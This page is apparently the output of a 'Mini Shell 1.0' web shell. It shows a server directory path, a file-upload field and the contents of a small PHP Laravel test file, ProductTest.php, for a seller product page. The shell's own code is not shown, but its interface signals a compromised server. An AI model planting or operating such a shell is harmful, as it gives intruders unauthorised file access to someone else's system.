HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/devs.lapieza.net/tests/Feature/Products/
Upload File :
Current File : /var/www/devs.lapieza.net/tests/Feature/Products/ProductTest.php
<?php

namespace Tests\Feature\Products;

use Tests\TestCase;

class ProductTest extends TestCase {
    public function testCreateProduct() {
        $response = $this->get('/seller/products/create');
        $response->assertStatus(200);
    }

    /*
     * Hago test
     * El test falla
     * Genero el codigo para solucionar el test
     * El test es procesado con exito
     * */

    public function testEditProduct() {
        $response = $this->get('/seller/products/create');
        $response->assertStatus(200);
    }
}